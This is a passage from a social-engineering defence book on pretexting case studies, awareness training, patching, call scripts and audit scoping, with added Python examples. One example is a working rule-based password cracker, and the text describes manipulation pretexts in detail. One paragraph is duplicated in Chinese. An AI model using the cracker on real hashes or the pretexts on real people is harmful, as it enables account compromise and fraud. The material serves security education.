Another minor lesson one can learn from analyzing this story is how to be fluid. What I mean by that is learning to go with the flow. When John started “gathering information” from the hacker he really didn’t know whether this person was a hacker or an admin. John’s first line, “Hey what’s up,” could have been answered by the attacker in many ways. Without knowing exactly the response he would get, John had no time to really prepare. He had to try to use lingo and react the way he imagined a hacker would.

John took it even a step further. Realizing that the best avenue was a submissive one, John put on the pretext of a “n00b,” or new hacker who didn’t know much and wanted a wonderful and intelligent real hacker to educate him. Feeding into the hacker’s ego, John got him to spill his guts about all sorts of things, including all his contact information and even a picture.

Why Case Studies Are Important

These case studies are just a few of the stories that are out there, and these are by far not the scariest. Every day governments, nuclear power plants, multibillion-dollar corporations, utility grids, and even whole countries fall victim to malicious social engineering attacks, and that doesn’t even include the personal stories of scams, identity theft, and robbery that are occurring by the minute.

As sad as reading all these stories is, one of the best ways to learn is by reviewing case studies. Experts from all fields utilize this methodology. Psychologists and doctors review countless hours of tapes and interviews to study the microexpressions people use when feeling certain emotions.

Persuasion experts review, analyze, and study accounts of positive and negative persuasion. Doing so helps them to pick up on the subtle areas that affect people and see how they can be used to learn and to protect their clients.

Law enforcement reviews case studies as part of their everyday lives to learn what makes a criminal tick. Along those lines, criminal investigators analyze and dissect every aspect of a malicious person, including what he eats, how he interacts with others, what he thinks about, and what makes him react. All of this information helps them to truly understand the mind of the criminal.

These same methods are how professional profilers target and catch the “bad guys.” In the same fashion, professional social engineers learn a lot by studying not only their own case studies but also cases in their own practice and malicious accounts they can find in the news. By reviewing case studies a social engineer can truly start to see the weakness of the human psyche and why the tactics in the social engineering framework work so easily. That is why I have been working hard to make sure the framework on www.social-engineer.org will include updated web stories and case studies that you can use to enhance your skills.

In the end, all of these exploits worked because people are designed to be trusting, to have levels of compassion, empathy, and a desire to help others. These are qualities that we should not lose as we have to interact with our fellow humans every day. Yet at the same time, these qualities are the very things that are more often than not exploited by malicious social engineers. It may seem that I am urging each of us to become a hardened, emotionless creature that walks around like a robot. Although that would definitely keep you protected from most social engineering attempts, it would make life dull. What I am promoting is being aware, educated, and prepared.

Summary

Security through education is the mantra of this book. Only when you are aware of the dangers that exist, only when you know how the “criminal” thinks, and only when you are ready to look that evil in the eye and embrace it can you truly protect yourself. To that end, the final chapter of this book discusses how to prevent and mitigate social engineering attacks.

Chapter 9

Prevention and Mitigation

The preceding chapters show you all the methods and ways that social engineers trick and scam targets into divulging valuable information. They also describe many of the psychological principles that social engineers use to influence and manipulate people.

Sometimes after I give a speech or security training, people will look very paranoid and scared and say something like, “It just seems there is no hope to even attempt security. How do I do it?”

That is a good question. I promote having a good disaster-recovery plan and incident response plan because nowadays it seems that it is not a matter of “if” you will get hacked, but “when.” You can take precautions to give you at least a fighting chance at security.

Social engineering mitigation is not as easy as ensuring hardware security. With traditional defensive security you can throw money into intrusion detection systems, firewalls, antivirus programs, and other solutions to maintain perimeter security. With social engineering no software systems exist that you can attach to your employees or yourself to remain secure.

In this chapter I present the top six steps I tell my clients they can take to prevent and mitigate social engineering attempts:
 
 
     
  • Learning to identify social engineering attacks
  • Creating a personal security awareness program
  • Creating awareness of the value of the information that is being sought by social engineers
  • Keeping software updated
  • Developing scripts
  • Learning from social engineering audits
 

These six points all boil down to creating a security awareness culture. Security awareness is not a 40-, 60-, or 90-minute program once a year. It is a culture, a set of standards that each person commits to applying throughout his or her life. It is not just about work, or about websites deemed “important,” but about the way one approaches being secure as a whole.

This chapter covers those six points and shows how creating a security awareness culture can be the best defense against a malicious social engineer.

 

Learning to Identify Social Engineering Attacks

 

The first stage in social engineering prevention and mitigation is to learn about the attacks. You do not have to dive so deep that you can build a malicious PDF or run the perfect con yourself. But understanding what happens when you open a malicious PDF, and what signs indicate that someone is trying to trick you, can help protect you. You need to understand the threats and how they apply to you.

Here is an illustration: You value your home and the things in it, and especially the people in it. You do not wait for your first fire to figure out how to plan for, prevent, and mitigate its danger. Instead you install smoke detectors and plan an escape route. You might teach your children “Stop, drop, and roll” in case their clothes catch fire. You teach them to feel a door for heat and to stay low to avoid inhaling smoke. All of these are ways to prevent or prepare for a fire before a real one forces you to deal with the devastation it brings.

The same principle applies to protecting yourself and your company from social engineering attacks. Do not wait for an attack to occur to learn how devastating one can be. Don’t think I’m self-serving, but I promote social engineering audits that regularly test your employees’ ability to withstand these attacks, followed by training.

Teach yourself and your employees how to “stop, drop, and roll,” so to speak, when faced with these types of attacks. What are the latest news stories on how social engineers are attacking companies? Knowing them can be a first line of defense, the same as knowing what a fire can do to your home. Learn the different methods that modern social engineers and identity thieves use. You can find an archive of news stories and examples involving social engineers, con men, identity thieves, and the like at www.social-engineer.org/framework/Social_Engineering_In_The_News.

 

Another good step is reading this book. It is full of the methods and principles that social engineers use to manipulate their targets. The book is more than a compilation of stories and clever hacks; it analyzes the thinking and tactics of the malicious social engineer.

Also check out the videos in the Resources area of www.social-engineer.org, which demonstrate exploits in action. The average user does not need to watch them in order to learn how to perform the attacks, but to understand how an SE performs them.

Basically, the more you know about how these attacks occur, the easier it is to identify them in the “wild.” Being aware of the body language, expressions, and phrases used in an SE attempt will make your ears perk up when you hear or see someone using these methods.

You do not need to spend a great deal of time learning about SE methods. However, spending a few minutes now and then reading the news and the stories on www.social-engineer.org or other sites can help you see the methods currently being used against companies.

After you have a good knowledge base and an audit under your belt, the next step, creating a security-minded culture, will seem simple to develop.

 

Creating a Personal Security Awareness Culture

 

In July 2010 I was part of a small team of security professionals that held one of the first organized, professional-level social engineering contests, at Defcon 18. Some of the best and brightest minds from around the globe come to Las Vegas, Nevada, once a year to speak, teach, and learn.

My team and I decided it would be a great opportunity to hold a contest that would show whether corporate America is vulnerable to this attack vector, exercised here in the form of a “contest.” We organized it so that interested people signed up to take part in two stages of social engineering: information gathering and active attacks.

To keep the contest legal and ethical we did not want any person victimized, so no Social Security numbers, credit card numbers, or other personally identifying information would be gathered. Our goal was not to get anyone fired. Nor was our goal to embarrass any particular company, so we also decided against collecting passwords or other security-related information from the companies. Instead we developed a list of about 25–30 “flags” that ranged from whether the company had an internal cafeteria, to who handles its trash disposal, to what browser it uses, to what software it uses to open PDFs. Finally, we chose target companies from every sector of corporate America: gas companies, tech companies, manufacturers, retail, and everything in between.

 

Each contestant was secretly assigned one target company, on which he had two weeks to do passive information gathering. That meant contestants were not allowed to contact the company, send it emails, or in any way try to social engineer information out of it. Instead they had to use the web, Maltego, and other tools to gather as much information as possible and enter everything they found in a professional-looking report.

From the information gathered we wanted contestants to develop a couple of plausible attack vectors that they thought would work in the real world. Then they had to come to Defcon in Las Vegas, sit in a soundproof booth, and make a 25-minute phone call to their target to execute the attack vector and see what information they could obtain.

I could spend the next 20–30 pages telling you what happened at that contest and what the outcome was, but one finding stands out: every contestant obtained enough information from the target that the company would have failed a security audit. Regardless of the contestant’s experience level and pretext, the contestants succeeded in accomplishing their goals. For a full report about the CTF and what occurred, visit www.social-engineer.org/resources/sectf/Social-Engineer_CTF_Report.pdf.

 

Now on to what applies here: security awareness. Corporations that care about security have programs that train employees to be aware of potential security risks arriving by phone, over the Internet, or in person. What we found was that security awareness in those companies was failing. Why? How could Fortune 500 companies that spend millions or more on security, training, education, and services designed to protect their employees be failing at security awareness?

That is my point in the title of this section: security awareness was not personal to the employees. Often in my professional practice, when I talk with employees about how they feel about an attack, they respond with something like, “It is not my data; why should I care?” That attitude shows that the security awareness these companies were trying to instill never hit home; it was not important, not effective, and most importantly, not personal.

In reviewing much of the material and methods available for so-called security awareness, I have found that it is boring, silly, and not designed to make the participant interact or think. Short DVD presentations that cover a ton of topics in a shotgun approach, blasting the participant with a lot of tiny facts, are not designed to sink in very deep.

 

What I challenge you to do, as a company or even as an individual, is to create a program that engages, interacts, and dives deep into security awareness. Instead of just telling your employees why long and complex passwords are a good idea, show them how quickly an easy password can be cracked. When I am asked to help run security awareness training for a client, I sometimes ask an employee to come up to my computer and type in a password she feels is secure. I do this before I present any information about passwords. Then, as I start the section on passwords, I start a cracker against that password. Usually within a minute or two the password is cracked, and I reveal to the room the password that was secretly typed into my computer. The immediate and drastic effect on each person is striking. After demonstrations like that, employees comment that they now understand how serious having a good password is.
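The following is an added example, not the author’s demonstration tool or any code from the book, of why that password demonstration works: a rule-based guesser runs a small wordlist through the mangling rules users actually apply (capitalize, leet substitutions, append a year or a symbol) against an unsalted SHA-256 hash. The wordlist, the rules, the hash choice, and the sample passwords are all constructed for illustration. A real cracker has a wordlist millions of entries long and GPU hash rates, so the gap between the “complex-looking” passwords and the long passphrase is far larger in practice than the guess counts here suggest.

```python
import hashlib

# Constructed wordlist: a few base words of the kind every real cracking list contains.
WORDLIST = ["password", "welcome", "summer", "dragon", "letmein", "company"]

# Suffixes users add to satisfy "complexity" rules; crackers try these first.
SUFFIXES = ["", "1", "123", "!", "2010", "2010!"]

# The usual leet substitutions (deliberately a small table).
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0"})


def candidates():
    """Yield guesses in the order a rule-based cracker would try them."""
    for word in WORDLIST:
        forms = {
            word,
            word.capitalize(),
            word.upper(),
            word.translate(LEET),
            word.capitalize().translate(LEET),
        }
        for form in sorted(forms):
            for suffix in SUFFIXES:
                yield form + suffix


def weak_hash(password):
    """Unsalted SHA-256, standing in for a weak credential store (assumption for the demo)."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack(target_hash, limit=None):
    """Return (password, attempts) if a guess matches, otherwise (None, attempts).

    `limit` caps the number of guesses so the caller can model a fixed time budget.
    """
    attempts = 0
    for guess in candidates():
        attempts += 1
        if weak_hash(guess) == target_hash:
            return guess, attempts
        if limit is not None and attempts >= limit:
            break
    return None, attempts


if __name__ == "__main__":
    # Two "complex-looking" passwords built from dictionary words, and one long passphrase.
    for pw in ["P@ssw0rd1", "Summer2010!", "correct horse battery staple"]:
        found, n = crack(weak_hash(pw))
        status = "cracked" if found else "not cracked"
        print(f"{pw!r}: {status} after {n} guesses")
```

Both dictionary-derived passwords fall within the 180 guesses this tiny rule set produces, while the passphrase survives the whole list; that difference, not the presence of an “@” or a “!”, is what the demonstration in the classroom makes visible.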

 

When I discuss malicious attachments in email, I do not have to show employees how to craft a malicious PDF, but I do show them what it looks like from both the victim’s and the attacker’s computers when a malicious PDF is opened. This helps them understand that what looks like a simple application crash can lead to devastation.

Of course, this teaching method produces a lot of fear, and although fear is not the goal, it is not a terrible side product, because employees will remember the lesson better. But the goal is to make them think not only about what they do at work and on their office computers, but also about their own bank accounts, home computers, and how they treat security on a personal level.

 

I want each person who hears a security presentation or reads this book to review how he interacts with the Internet as a whole and to make serious changes: stop reusing passwords, stop storing passwords or personal information in insecure locations, and think about where he connects to the Internet. I cannot tell you how many times I have seen a person sitting in the middle of a Starbucks on its free Wi-Fi, checking a bank account or making an online purchase. As much as I want to walk up and tell that person how quickly her whole life can be turned upside down if the wrong person is sitting on that same network, I don’t.

I also want readers to think about how they give out information over the phone. Con men and scam artists use many avenues to steal from the elderly, from people going through hard economic times, and from everyone else, and the phone remains a very powerful one. Being aware of your vendors’, banks’, and suppliers’ policies on what they will and will not ask for over the phone can help you avoid many of the pitfalls. For example, many banks state in their policies that they will never call and ask for a Social Security number or bank account number. Knowing this can keep you from falling for a scam that empties your life savings.

Calling security awareness a “program” indicates that it is something ongoing. A program means you schedule time to continually educate yourself. After you obtain all this useful information, you can use it to develop a program that helps you stay secure.

 

Being Aware of the Value of the Information You Are Being Asked For

 

Referring again to the Defcon 18 social engineering contest, we learned another valuable lesson from it: when information is perceived as having little or no value, little effort goes into protecting it.

That is a heavy-duty statement, but it was proven true by how many targets willingly handed over information about their cafeterias, waste removal, and much more. You must realize the value of the data you hold, and be aware that a social engineer may use a tactic specifically to reduce the value of that information in your eyes.

Before giving information to someone, determine whether the person calling or interacting with you deserves it. Humans have a built-in desire to help those whom we perceive to need it, and that is a major way a social engineer manipulates a target into handing over valuable information. Analyzing the person you are interacting with, and determining whether she deserves the information she is asking for, can spare you the embarrassment and damage of falling victim.

 

For example, in the social engineering contest at Defcon one contestant used the pretext of being a customer of a major antivirus company. He called in with a serious problem: his computer could not get online, he felt it was due to something the antivirus software was doing, and he wanted the technical support representative to do one simple thing, browse to a website.

Malicious SEs often use this attack vector. By driving a victim to a website that embeds malicious code or hosts malicious files, they can gain access to the target’s computer and network. In the contest the website was not malicious at all, but the point was to show that if this had been a real attack, it would have succeeded.

The contestant’s first attempt went like this: “I cannot browse to my website and I think your product is blocking me. Can you check by going to this site, so I know for sure whether it is your software or not?”

 

The technical support representative answered well: “Sir, our product would not block you from going to that site; it wouldn’t matter whether I can go there or not.” He declined the request.

The contestant did not give up. After talking a bit more he tried again: “I know you said your product would not block the site, but it worked until I installed your software, so can you please check for me?”

Again the request was declined: “Sir, I am sorry for the inconvenience, but again, our product would not block you, and my going to the site will not help you fix the problem.”

 

It seemed as if the request was going to be rejected for good when the contestant made one last-ditch effort: “Sir, it would make me feel better if you would just try going to this site for me. Please, can you help me out?”

That simple request put our technical support rep over the edge; he opened his browser and went straight to the site. He had the right idea, he even had the right security awareness answer, but in the end he wanted his “customer” to “feel better” and honored the request. Had this been a malicious attack, it could have led that company into a major pitfall.

The representative knew that the request was not relevant to that particular call. Like him, you must be determined to analyze whether the information or action being asked for is deserved and relevant to the person you are interacting with. Approach the scenario from the other angle: if the contestant had been a legitimate customer and the rep had declined to visit the website, what is the worst that could have happened?

 

The customer might have been a little upset at being refused, but it would not have changed the outcome. The product he had was not the cause of his woes.

A social engineer often uses charm to start a conversation about the weather, work, the product, anything at all, and uses it to draw out the information sought. This is where a good security awareness policy comes into play: educating your employees about the tactics that might be used against them can keep them from acting out of fear.

In one audit the pretext I used was being the assistant to the CFO. The call center employees feared losing their jobs if they rejected requests from such high-level management. Why? They had not been given the education to know that rejecting that request would not cost them their jobs. At the same time, protocols should be in place so that the employee knows when a request for information is proper.

 

The perceived value of the information being asked for ties closely to having educated and aware people who know that even minor tidbits of data can lead to a massive breach. Knowing that the person on the other end of the phone does not really need the name of the company that prepares the cafeteria food helps an employee answer appropriately. If you are an employer, help your employees develop answers to these requests. In most cases a simple “Sorry, I don’t have that information; please contact our purchasing department if you need it,” or “I’m sorry, I am not allowed to divulge that information, but you can send an email to info@company.com to request it,” goes a long way toward quashing social engineering efforts.

I mentioned earlier that creating an atmosphere in which information seems less valuable is also a tactic social engineers use to get people to freely divulge this “unimportant” information.

Using the contest again as an example, one contestant was asked to provide some identifying information. His pretext was that he worked for a company hired to do an internal audit, and when the target wanted to verify who he was, he asked for something off the requisition form. Our contestant pretended to lean over to an imaginary co-worker and said, “Jane, the gentleman from Your-Target-Company wants the ID number from the requisition; can you do me a favor and grab it from Bill’s desk?”

 

While “Jane” went to get the form, the contestant engaged the target in idle chitchat. “How’s the weather in Texas?” and “Have you ever been to Charlie’s Pub?” escalated into “Who handles the food for the cafeteria?” and “Want to see a cool website we are working on here?”

All of this happened while he was “waiting” for the ID number. Social engineers use this tactic every day. Diversion and charm are key tools in many pretexts. Information asked for during “chitchat” is perceived as having less value because of when in the conversation it is asked for. If the SE had asked the same question while “verifying his audit findings,” it would have met a different attitude; because he asked during a friendly conversation, a great deal of information was given freely.

The mitigation for this SE tactic is to weigh the value of the information you are about to release, regardless of when in the conversation it is asked for. In the example above, the target’s simply waiting for the ID number before continuing any conversation would have been entirely appropriate and would have saved him from being duped.

This particular point is not always easy to implement, because employees, especially those facing the customer, must be able to release some information without fear of attack. Simply being aware of the value of information cannot by itself stop an attack.

 

Keeping Software Updated

 

In most businesses you must be able to release information to the public and to clients. Even in my business I must be able to give out my phone numbers, email addresses, and web addresses. I must be able to send and receive PDF files, and I have to be able to talk freely on the phone with clients, suppliers, and vendors.

However, the points discussed so far suggest that releasing any of this information could be the end of one’s business and possibly one’s privacy. What can you do to have the freedom to release certain information without fearing the end?

Keep updated. In our contest, more than 60% of the companies that were called were still using Internet Explorer 6 and Adobe Acrobat 8. Those are staggering statistics.

 

Dozens if not hundreds of public vulnerabilities exist in those two applications alone. Knowing that a target uses them opens it up to an enormous number of attacks, attacks so effective that the IDS, firewall, and antivirus systems cannot possibly stop them all, because the payload arrives inside a PDF or web page the user was asked to open. But do you know what can stop them?

The answer is updates. The newest version of a piece of software generally has its known security holes patched, or at least the majority of them. If a particular piece of software has a horrible track record, don’t use it; switch to something less vulnerable.

The problem is that companies are very slow when it comes to upgrades. IE 6 is very old, close to the end of its Microsoft support life. Adobe Acrobat 8 has dozens of publicly available exploits. Those are just two of the many pieces of information we found out in the contest. The reality, though, is that you have to be able to release information. You must be able to tell people freely what is going on. To do that with less worry, you must make sure you and your employees use updated software.

 

In the contest calls, if an employee had divulged that the company used an up-to-date browser such as Firefox or Chrome, or Foxit or the current Adobe software, the contestants would have been shut down. I am not saying that software never has problems; exploits for certain versions certainly exist. But a current version is significantly less exposed, and the point is the patch level rather than the brand. Possessing that information is still valuable to an attacker, but if no working exploit is available, the next phase of the attack cannot be launched.
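The contest flags about browsers and PDF readers translate directly into an inventory check. The following added example, mine rather than anything from the book or the contest report, takes a constructed software inventory and a minimum-version policy and lists the hosts that would have handed a caller a working exploit path. The product names are real, but the version floors and the hosts are assumptions chosen for illustration, not vendor support dates; in practice the floor for each product comes from the vendor’s current security advisory.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Installed:
    """One row of a software inventory: which host runs which product at which version."""
    host: str
    product: str
    version: str


def parse_version(text):
    """Turn '8.1.2', '6', or '8.0.6001' into a comparable tuple.

    Non-digit characters are dropped and missing components count as 0, so '9.3'
    compares equal to '9.3.0' and below '9.3.1'.
    """
    parts = []
    for piece in text.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


# Assumed policy: the lowest version still acceptable for each product.
# The numbers are illustrative; a real floor comes from the vendor's current advisory.
MINIMUM_VERSION = {
    "Internet Explorer": "8.0",
    "Adobe Acrobat": "9.3",
    "Firefox": "3.6",
    "Chrome": "5.0",
}


def is_outdated(item, policy=MINIMUM_VERSION):
    """True if the product is covered by the policy and installed below its floor.

    Returns None for products the policy does not cover, so they are surfaced
    for review instead of silently passing.
    """
    floor = policy.get(item.product)
    if floor is None:
        return None
    return parse_version(item.version) < parse_version(floor)


def audit(inventory, policy=MINIMUM_VERSION):
    """Split an inventory into (outdated, unknown) lists."""
    outdated, unknown = [], []
    for item in inventory:
        verdict = is_outdated(item, policy)
        if verdict is None:
            unknown.append(item)
        elif verdict:
            outdated.append(item)
    return outdated, unknown


# Constructed inventory resembling what the contest calls revealed.
SAMPLE_INVENTORY = [
    Installed("hr-ws-01", "Internet Explorer", "6.0"),
    Installed("hr-ws-01", "Adobe Acrobat", "8.1.2"),
    Installed("fin-ws-07", "Internet Explorer", "8.0.6001"),
    Installed("fin-ws-07", "Adobe Acrobat", "9.3.4"),
    Installed("eng-ws-12", "Firefox", "3.6.8"),
    Installed("eng-ws-12", "Foxit Reader", "4.1"),
]


if __name__ == "__main__":
    outdated, unknown = audit(SAMPLE_INVENTORY)
    for item in outdated:
        floor = MINIMUM_VERSION[item.product]
        print(f"PATCH  {item.host}: {item.product} {item.version} is below floor {floor}")
    for item in unknown:
        print(f"REVIEW {item.host}: {item.product} {item.version} is not covered by the policy")
```

Two design points matter more than the version arithmetic: products the policy does not name are reported rather than ignored, since an unlisted PDF reader is exactly the gap an attacker hopes for, and the floor is compared numerically so that a build like 8.0.6001 is not mistaken for an ancient 8.0 by a string comparison.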

 

Keeping software updated is the one tip that seems to draw the most flak, because it takes the most work and can cause the most overhead. Changing internal policies and methodologies that allow very old software to remain in use can be very difficult and cause all sorts of internal shifts.

However, if a company is committed to security and to creating personal security awareness, then committing to these changes will become part of the business culture.

 

Developing Scripts

 

One more beneficial thing bears mentioning: develop scripts. Don’t cringe; I don’t mean scripts in the sense that the employee must say X whenever the situation equals A plus B. I mean outlines that help an employee be prepared to apply critical thinking when it counts most. Consider these scenarios:

What is the proper response when someone who claims to work for the CEO calls and demands your password? What do you do when a man with no appointment, who looks and acts the part of a vendor, demands access to a part of the building or property?

Scripts can help an employee determine the proper response in these circumstances and help them feel at ease. For example, a script might look like this:

If someone calls claiming to be from the management office and demands compliance, whether by handing over information or internal data, follow these steps:

 

1. Ask for the person’s employee ID number and name. Do not answer any questions until you have this information.

2. After getting the identifying information, ask for the project ID number of the project he or she is managing that requires this information.

3. If the information in steps 1 and 2 is obtained, comply. If it is not, ask the person to have his or her manager send an email to your manager requesting authorization, and terminate the call.

 

A simple script like this can help employees know what to say and do in circumstances that test their security consciousness. Keep in mind that an employee ID or project number is only as good as the lookup behind it: numbers read out by a caller should be checked against the company directory, not simply written down, because those are exactly the kind of details an attacker gathers before ever picking up the phone.
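Here is an added example of that script as a decision procedure, my own illustration rather than anything from the book: it follows the three steps above, but gives steps 1 and 2 teeth by checking the caller’s employee ID, name, and project ID against an internal directory instead of merely recording them. The directory contents, the employee and project identifiers, and the phrasing the employee uses are all constructed.

```python
from dataclasses import dataclass, field
from typing import Optional

# Constructed internal directory: who each employee ID belongs to, and which
# employees are assigned to which project IDs. In a real deployment these come
# from the HR system and the project register, never from what the caller says.
EMPLOYEES = {"E10421": "Dana Ruiz", "E10877": "Priya Nair"}
PROJECTS = {"PRJ-2010-07": {"E10421"}, "PRJ-2010-11": {"E10877"}}

# Step 3's fallback wording (assumed phrasing).
ESCALATION = ("Please have your manager email my manager to request "
              "authorization; I will end the call now.")


@dataclass
class CallerRequest:
    """What the caller has claimed so far; anything not yet supplied is None."""
    claimed_name: Optional[str] = None
    employee_id: Optional[str] = None
    project_id: Optional[str] = None
    requested_data: str = ""


@dataclass
class Decision:
    action: str                       # "comply" or "escalate"
    reason: str
    steps_passed: list = field(default_factory=list)
    say: str = ""                     # what the employee tells the caller


def handle_call(req, employees=EMPLOYEES, projects=PROJECTS):
    """Apply the three-step script with a directory lookup behind steps 1 and 2."""
    passed = []

    # Step 1: no employee ID and name means no answers, and the pair must match
    # the directory rather than merely sound plausible.
    if not req.employee_id or not req.claimed_name:
        return Decision("escalate", "caller did not supply employee ID and name", passed, ESCALATION)
    if employees.get(req.employee_id) != req.claimed_name:
        return Decision("escalate", "employee ID does not match the directory", passed, ESCALATION)
    passed.append("identity")

    # Step 2: the project must exist and the caller must actually be assigned to it.
    if not req.project_id or req.project_id not in projects:
        return Decision("escalate", "no valid project ID for this request", passed, ESCALATION)
    if req.employee_id not in projects[req.project_id]:
        return Decision("escalate", "caller is not assigned to the named project", passed, ESCALATION)
    passed.append("project")

    # Step 3: both checks held, so the script allows the employee to comply.
    return Decision("comply", f"release {req.requested_data} to {req.claimed_name}", passed,
                    f"Thanks, I can send the {req.requested_data} over now.")


if __name__ == "__main__":
    calls = [
        CallerRequest("Dana Ruiz", "E10421", "PRJ-2010-07", "vendor list"),   # legitimate
        CallerRequest("Dana Ruiz", "E10421", "PRJ-2010-11", "vendor list"),   # wrong project
        CallerRequest("Dana Ruiz", None, None, "vendor list"),                # refuses to identify
        CallerRequest("Dana Ruiz", "E10877", "PRJ-2010-11", "vendor list"),   # harvested ID, wrong name
    ]
    for call in calls:
        d = handle_call(call)
        print(f"{d.action:8} steps={d.steps_passed} reason={d.reason}")
```

Without the lookup, a caller who harvested a real employee ID and a project number during the information-gathering phase passes both steps; with it, the attacker needs a matching name and ID pair on a project that covers the request, which is considerably harder to collect by phone.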

 

Learning from Social Engineering Audits

 

If you have ever broken a limb, you know that as you recover your doctor may send you for therapy. As the therapists rehabilitate you, you may undergo some stress testing. This type of testing lets your doctors see whether you have weaknesses that need to be strengthened. The same applies to your business, except that instead of waiting for the “break” to occur before you “test,” social engineering audits let you stress-test your company before a breach occurs.

The following sections answer a few key questions about social engineering audits and how to choose the best auditor. Before going deeper, you should know what an audit really is.

 

Understanding What a Social Engineering Audit Is

 

In the most basic terms, a social engineering audit is an engagement in which a security professional is hired to test the people, policies, and physical perimeter of a company by simulating the same attacks a malicious social engineer would use. The three main differences between a malicious social engineer and a professional auditor are:

 
 
     
  • Moral and legal guidelines exist that a professional auditor follows.
  • The goals of the professional auditor are always to help, never to embarrass, steal from, or harm a client.
  • Professional audits generally have scope limitations that are not imposed on real attackers.
 

专业审计员将花费大量时间分析和收集“目标”或客户的数据,并利用这些信息制定切实可行的攻击媒介。在执行此操作时,专业审计员始终牢记每次审计的书面目标。这是难题中必不可少的一部分,因为走上一条可能对 SE 和目标都产生非常不良影响的道路可能很诱人。明确定义的目标可以防止社会工程审计员犯下这种错误。

The professional auditor will spend a lot of time analyzing and gathering data on a “target” or client and will use that information to develop realistic attack vectors. While doing this the professional auditor always keeps in mind the goals that are set forth in writing for each audit. This is an essential piece of the puzzle, because going down a path that can have very bad repercussions on both the SE and the target might be tempting. Clearly defined goals can keep a social engineering auditor from making that mistake.

Setting Audit Goals

The professional social engineer must engage in moral and ethical behavior while still stretching across that line that allows him or her to put on the true “black hat” of a malicious social engineer. This means taking note of things that he or she can use to gain access and expose a hole or weakness in a company’s defenses, no matter how low it may seem.

Finding the security gaps has to be balanced with a concern for the individual employees. Companies that are hacked during a social engineering audit often think that firing the employee(s) who fell for the attack fixes the problem and plugs the “hole.” What the client fails to realize is that after an audit, those employees who did fall for the attacks are probably the most secure people in the building at that time.

The professional social engineer must take extra precaution to ensure that the employees are not put into the line of fire. Personally I make it a key point to tell clients that the audit is not about the employees and, as far as I can help it, I do not include names of the employees who were used. In cases where that cannot be helped and I need to include those names, I focus the report on the flaws the company has in its training, policies, and defenses that allowed the employee to falter.

Throwing an employee under the bus, so to speak, or ruining his or her character or life should never be an option for a routine social engineering audit. When outlining the goals of an audit with an auditor I outline the level of intensity from 0 to 10 for these key areas:

  • To determine whether employees will click on links in emails or open files from people they do not know well, leading to compromise
  • To determine whether an employee would go to a website and enter personal or business-related information on that site
  • To determine how much information can be obtained via the phone or in-person visits of employees at work or personal places (that is, bars, gyms, daycares)
  • To determine the level of security in the office perimeter by testing locks, cameras, motion sensors, and security guards
  • To determine the ability of a social engineer to create a malicious USB or DVD that will entice the employee to use it on his or her work computer, compromising the business

Of course, more areas will be tested, but what I try to do is outline closely the goals the company has for this audit. What I find is that companies often do not know what they want. The auditor’s job is to walk them through different avenues into the company and to determine which of those they want tested.

When these goals are clearly defined, you should also include a list of things that are never to be included in an audit.

What Should and Should Not Be Included in an Audit

Many different ways exist for testing the outlined goals to see clearly whether a security hole exists in a company. Using all the principles in this book can help outline a good plan for attack. However, some things should be avoided when planning an attack, such as:

  • Attacking a target’s family or friends
  • Planting evidence of crimes or infidelity to discredit a target
  • Impersonating law enforcement, which, depending on the laws of the land, can be illegal
  • Breaking into a target’s home or apartment
  • Using evidence of a real affair or embarrassing circumstance to blackmail a target into compliance

Things like these should be avoided at all costs because they do not accomplish the goal and leave the target feeling violated. However, the question does come up of what to do if, during an audit, evidence of some of these things appears. Each auditor must personally decide how to handle these circumstances, but consider a couple of examples.

In one audit, an auditor found out an employee was using the company’s high-speed Internet to download gigabytes worth of porn to external hard drives. Instead of risking the employee getting fired, he went to the employee and told him he knew, but that he didn’t want him to get fired and just gave him a warning to stop. The employee became embarrassed and upset and figured the auditor was still going to report him. He decided he wanted to preemptively combat this attack, and he went to the owners and said the auditor was planting evidence of this offense on his computer.

Of course, the auditor had logs and screenshots of when the compromise occurred, and the employee was fired anyway. But the auditor was also reprimanded for not coming forward when he found an offense against which the company had a strict policy.

In another account, the auditor found evidence of a man downloading child pornography to his computer and then distributing it to others on the Internet. The auditor knew from the other images on his computer that he had a wife and children and that reporting this would lead to divorce, probably jail time, and the ruination of his career as well as the family’s life.

The law of the land was that child pornography was illegal, as well as morally disgusting and vile. The auditor turned the man in to the company as well as the authorities, which cost that man his career, family, and freedom.

Having a clearly defined “do not” list enhances your audits and keeps you from crossing your own moral and legal guidelines. In one interview I had with Joe Navarro, one of the world’s leaders on nonverbal communication, he made a statement about this point. He said that unless you are a law enforcement agent you have to decide what lines you will and will not cross before you enter into an engagement. With that in mind, what should an auditor include in audits?

  • Phishing Attacks: Targeted email attacks that allow a company to see whether its employees are susceptible to attacks through email.
  • Pretexting In-Person Attacks: Very precise and controlled pretexts are chosen and then performed over the phone or in person to determine whether employees will fall for them.
  • Baiting: An in-person attack where access is gained to the target’s building or other property by some method, and USBs or DVDs are dropped that contain malicious files embedded with malicious code.
  • Tailgating (or piggybacking): An in-person attack where the auditor attempts to approach a group of employees to gain access to the building by just following them in.
  • Physical Security (Red Team): An attempt to gain physical access to an office and take items of value to the company.

This short list can help a professional auditor set some guidelines to define what should and should not be included. Still, one of the largest problems many companies have is trying to pick out a good auditor, one who can accomplish these tasks at hand.

Choosing the Best Auditor

If you broke a limb and the damage was bad, and a doctor told you that you have a chance for only 50% recovery, but that going to see a good surgeon could increase those odds, wouldn’t you search high and low for a good surgeon to fix your problems? And when you found him, what questions would you ask? Wouldn’t you want to see his past work? You would want some proof of his ability to grasp the concepts and perform the tasks that would increase your chances of recovery.

You follow a similar process to find the right auditor. Here are some of the basics that you might want to find out as you speak to an auditor:

  • Knowledge: Has the team released any research, papers, speeches, or other materials that display they are knowledgeable about social engineering? Are they known in the community for being leaders in this field? You do not want to trust your audit and security to a team that is using outdated methods and is not up on the most recent tactics being used.

Determining the amount of knowledge an auditor and team has is hard to do without a little research. Asking auditors about any papers, articles, or information they have written on the topics is not a bad idea. Make sure the team you hire is at the top of its game.

  • Experience: Clients often do not want to be identified or named. In my case, many clients do not want to be put on a website or marketing material because they feel this will embarrass them or make them vulnerable. But you can determine the experience of the auditor in other ways. Ask him about the methods he has used and how he implemented solutions in the past.

An auditor often does not want to let all the secrets out of the bag in an initial meeting, but ask him for one or two accounts of attacks he launched, which will help you determine his level of skill.

